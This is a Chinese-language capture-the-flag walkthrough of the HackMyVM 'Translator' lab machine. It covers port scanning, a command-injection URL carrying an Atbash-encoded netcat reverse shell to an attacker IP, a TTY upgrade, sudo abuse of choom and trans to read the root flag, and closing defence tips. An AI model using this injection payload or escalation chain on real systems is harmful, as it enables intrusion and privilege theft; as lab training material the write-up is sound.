hackmyvm系列9——translator
字数 928 2025-08-12 11:34:21
HackMyVM系列9——Translator靶机渗透教学文档
1. 靶机信息
- IP地址: 192.168.152.155
- 服务: Web应用(在线加密网站)
- 难度: 中等
2. 信息收集阶段
2.1 网络扫描
使用netdiscover进行局域网主机发现:
netdiscover -r 192.168.152.0/24
2.2 端口和服务扫描
使用nmap进行详细扫描:
nmap -sV -Pn -sC -A 192.168.152.155
3. Web应用分析
3.1 功能分析
- 访问Web页面发现是一个在线加密网站
- 测试发现输入"aaa"得到"zzz"
- 加密逻辑: 根据26个字母顺序倒序加密(a→z, b→y, ..., z→a)
3.2 命令注入漏洞
发现Web应用存在命令注入漏洞,可以通过管道符|执行系统命令
4. 初始访问
4.1 反弹Shell
利用命令注入漏洞建立反向Shell:
http://192.168.152.155/translate.php?hmv=aaaa|mx -x hs 192.168.152.213 6666
4.2 稳定Shell
获取交互式Shell:
python3 -c "import pty;pty.spawn('/bin/bash');"
5. 本地枚举
5.1 文件发现
在当前目录发现文件hvxivg,读取内容后发现是加密的
5.2 解密文件
使用反向字母加密解密hvxivg文件:
- hvxivg → secret
- 解密后得到命令
cat /etc/passwd
5.3 用户枚举
查看/etc/passwd发现存在多个用户,测试发现ocean用户可以登录
6. 权限提升
6.1 检查sudo权限
sudo -l
发现可以以india用户身份执行choom命令:
sudo -u india choom -n 0 /bin/sh
6.2 获取更高权限Shell
python3 -c "import pty;pty.spawn('/bin/bash');"
再次检查sudo权限,发现可以利用任意文件读取
6.3 读取root flag
使用trans工具读取root.txt:
sudo -u root /usr/local/bin/trans -i /root/root.txt -no-autocorrect
7. 关键知识点总结
- 字母反向加密: 理解a→z, b→y,..., z→a的加密模式
- 命令注入: 通过管道符
|实现命令注入 - 反弹Shell技术: 使用mx工具建立反向连接
- 交互式Shell升级: 使用Python获取完整TTY
- sudo权限利用: 分析sudo -l结果,利用特定命令提权
- 任意文件读取: 通过trans工具读取root权限文件
8. 防御建议
- 对Web应用输入进行严格过滤,防止命令注入
- 限制sudo权限,避免不必要的命令执行权限
- 对敏感文件设置严格的权限控制
- 定期进行安全审计,检查系统配置漏洞